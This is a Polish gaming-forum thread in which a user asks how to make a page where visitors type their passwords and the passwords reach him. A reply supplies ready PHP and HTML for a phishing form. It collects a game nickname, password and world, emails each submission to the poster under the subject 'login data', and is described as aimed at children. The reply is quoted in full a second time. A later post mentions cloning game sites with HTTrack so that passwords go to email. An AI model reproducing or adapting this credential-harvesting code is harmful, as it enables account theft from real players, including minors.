Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

[Pytanie] Jak zrobić taką stronę


Rekomendowane odpowiedzi

Opublikowano

Siema mam pytanie jak zrobić taką stronę na cba ? np ktoś wpisuje passy i mi one przychodzą, albo wysyła się sms, a ta osoba dostaje kod zwrotny i musi go wpisać na stronę żeby coś dostać . .. nie chodzi mi o oszukanie ludzi tylko chcę się czegoś takiego nauczyć ;)

 

 

 

fc179.png

damjian.png

Opublikowano

Poniżej masz gotowy kod formularza kontaktowego, który wystarczy wstawić na stronę.

 

Do skonfigurowania pod siebie masz te linijki kodu :

 

<meta name="Description" content="Opis Strony">

<meta name="Keywords" content="Tagi">

<title>Tytul strony - to co sie pokazuje na pasku u gory</title>

(...)

$email = 'TUWPISZSWOJEMAIL';

 

Resztę już ogarnij sam.

 

Formularz działa na serwerach obsługujących PHP oraz z włączoną funkcją mail.

 


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <meta http-equiv="Content-type" content="text/html; charset=iso-8859-2">
 <meta name="Description" content="Opis Strony">
 <meta name="Keywords" content="Tagi:">
 <title>Tytul strony - to co sie pokazuje na pasku u gory</title>
</head>
<body>
<?php
if (count($_POST))
{
////////// USTAWIENIA //////////
$email = 'TUWPISZSWOJEMAIL';
$subject = 'Dane do logowania';
$message = 'Dziękujemy za wysłanie formularza';
$error = 'Wystapił bład podczas wysyłania formularza';
$charset = 'iso-8859-2';
//////////////////////////////

$head =
"MIME-Version: 1.0\r\n" .
"Content-Type: text/plain; charset=$charset\r\n" .
"Content-Transfer-Encoding: 8bit";
$body = '';
foreach ($_POST as $name => $value)
{
if (is_array($value))
{
for ($i = 0; $i < count($value); $i++)
{
$body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
}
}
else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
}
echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">
  <p>Twój nick:</p>
	   <input type="text" name="Nick">
  <p>Hasło:</p>
	   <input type="text" name=Haslo"></td>
  <p>Świat:</p>
	 Świat 1<input type="radio" name="Swiat" value="Swiat 1" />
	 Świat 2<input type="radio" name="Swiat" value="Swiat 2" />
	 Świat 3<input type="radio" name="Swiat" value="Swiat 3" />
  <p>
  <input type="submit" value="Wyślij"> <input type="reset" value="Odśwież Pola">
  </p>

</form>
<?php
}
?>

</body>
</html>

 

TO NIE JEST SKRYPT, KTÓRY DODAJE PUNKTY W MARGONEMIE CZY INNYM GÓWNIE. TO JEST FORMULARZ TYPOWO POD DZIECI NEO.

Opublikowano

Poniżej masz gotowy kod formularza kontaktowego, który wystarczy wstawić na stronę.

 

Do skonfigurowania pod siebie masz te linijki kodu :

 

<meta name="Description" content="Opis Strony">

<meta name="Keywords" content="Tagi">

<title>Tytul strony - to co sie pokazuje na pasku u gory</title>

(...)

$email = 'TUWPISZSWOJEMAIL';

 

Resztę już ogarnij sam.

 

Formularz działa na serwerach obsługujących PHP oraz z włączoną funkcją mail.

 


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
 <meta http-equiv="Content-type" content="text/html; charset=iso-8859-2">
 <meta name="Description" content="Opis Strony">
 <meta name="Keywords" content="Tagi:">
 <title>Tytul strony - to co sie pokazuje na pasku u gory</title>
</head>
<body>
<?php
if (count($_POST))
{
////////// USTAWIENIA //////////
$email = 'TUWPISZSWOJEMAIL';
$subject = 'Dane do logowania';
$message = 'Dziękujemy za wysłanie formularza';
$error = 'Wystapił bład podczas wysyłania formularza';
$charset = 'iso-8859-2';
//////////////////////////////

$head =
"MIME-Version: 1.0\r\n" .
"Content-Type: text/plain; charset=$charset\r\n" .
"Content-Transfer-Encoding: 8bit";
$body = '';
foreach ($_POST as $name => $value)
{
if (is_array($value))
{
for ($i = 0; $i < count($value); $i++)
{
$body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
}
}
else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
}
echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">
  <p>Twój nick:</p>
	   <input type="text" name="Nick">
  <p>Hasło:</p>
	   <input type="text" name=Haslo"></td>
  <p>Świat:</p>
	 Świat 1<input type="radio" name="Swiat" value="Swiat 1" />
	 Świat 2<input type="radio" name="Swiat" value="Swiat 2" />
	 Świat 3<input type="radio" name="Swiat" value="Swiat 3" />
  <p>
  <input type="submit" value="Wyślij"> <input type="reset" value="Odśwież Pola">
  </p>

</form>
<?php
}
?>

</body>
</html>

 

TO NIE JEST SKRYPT, KTÓRY DODAJE PUNKTY W MARGONEMIE CZY INNYM GÓWNIE. TO JEST FORMULARZ TYPOWO POD DZIECI NEO.

 

 

thx za odp

http://i45.tinypic.com/2hozbzc.png

coś takiego jest na samej górze strony

jest możliwość wgrania grafiki jakieś, tła i wysierodkowania ?

damjian.png

Gość LastPhoenix450
Opublikowano

Tych metinowskich gówien co kradną konta jest mnóstwo, S0nixs kiedyś nawet robił tuta jak pobrać stronę httrackiem i przerobić żeby passy szły na meila xD

 

@Down

 

Przerabiasz i działa na tej samej zasadzie.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...